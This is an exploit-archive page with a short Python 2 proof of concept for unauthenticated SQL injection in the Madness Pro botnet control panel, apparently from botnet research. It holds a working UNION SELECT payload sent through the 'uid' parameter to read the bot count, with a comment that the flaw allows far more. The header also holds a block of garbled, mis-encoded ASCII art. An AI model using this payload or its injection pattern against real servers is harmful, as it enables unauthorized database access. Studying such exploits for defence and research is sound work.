Madness Pro <= 1.14 - SQL Injection
2014-06-06 14:05:03#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
# â��â��â�� â��â��â��â��· â��â��â��â��â�� • â�� â�� ·. â��· â��â��
# â��â��• â�ª â��â�� â��â��â�ªâ�ª •â��â�� â�ª ·â��â�� â��â��â��â��â�ªâ��â��â�ªâ��â��â��
# â��â��â�ª â��â��â��â�� â��â��â��â��â��â�� â��â��â��â�� â��â��.â�ª â��â��â��â�� â��â�� â��â��â��â��â��·â��â��â��â��â��â�ª
# â��â��â��â��â��â��â��â��.â��â��â��â��â��â�ªâ��â��â��â��â��.â��â�� â��â��â��·â��â��â��.â��â��â��â�� â��â��â��â��â��â�� â��â��â��·.
# .â��â��â�� â��â��â��â��â�ª·â��â��â��â�� â��â��â��â��â�ª â��â��â�� â��â��â��â��â�ªâ��â�� â��â�ªâ��â��â�� â�� •
# â��â��· â��• â��â��â��â��â�� â�ª â�� â�� â��â�� • • â�� â�� ·. â��â��â��· ·â��â��â��â�� â�� â�� â��â��â�� ..â��â�� · .â��â�� ·
# â��â�� â��â�ªâ��â�ªâ��â��â��â��â�� â��·â��â�� •â��â��â��â��â��â�� â�� â�ª ·â��â�� â��â��â��â��â�ªâ��â�� â��â�� â��â��â�ª â��â�� •â��â��â��â��â��â��.â��·â��â�� â��. â��â�� â��.
# â��â�� â��â��â��â��â��â��â��â��â��â��â�� â��â��·â��â��â��â��â��â��â�� â��â��â�� â��â�� â��â��â��â��â��·â��â��â��â��â�� â��â��· â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â��â��â��â��â��â��â��â��â��â��â��â��
# â��â��â��â��â��â��â��â��â��â��â��â��•â��â��â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â�� â��â�� â��â��â��â��â��â��â��â�� â�ªâ��â��â��â��. â��â�� â��â��â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â��â��â��â��â�ªâ��â��
# ·â��â��â�� â��â��â�� .â�� â��â��â��â��â��â�� â��â�ª·â��â��â��â�� â��â�� â��â�ªâ��â��â�� â�� â�� â��â��â��â��â��• â��â�� â��â�ª â��â��â�� â��â��â��â�� â��â��â��â��
#
# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
#
# References:
# http://blog.cylance.com/a-study-in-bots-lobotomy
#
import urllib
# Fill in URL that Madness Pro bot connects back to
panel_url = ""
def run_sqli_proof_of_concept(panel_index_url):
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
"%20--%20--".format(panel_index_url))
print f.read()
run_sqli_proof_of_concept(panel_url)
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.